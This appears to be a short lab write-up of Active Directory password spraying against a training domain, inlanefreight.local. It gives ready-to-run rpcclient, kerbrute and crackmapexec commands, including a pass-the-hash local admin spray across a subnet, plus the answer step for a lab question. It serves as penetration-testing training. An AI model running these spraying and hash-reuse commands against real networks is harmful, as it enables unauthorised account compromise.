Bash one-liner:

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Using kerbrute:

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Using CME (filtering logon failures):

crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Local admin spraying with CME: (when local admin password is used everywhere for example)

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Writeup

Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.

crackmapexec smb 172.16.5.5 -u users2.txt -p Welcome1 --continue-on-success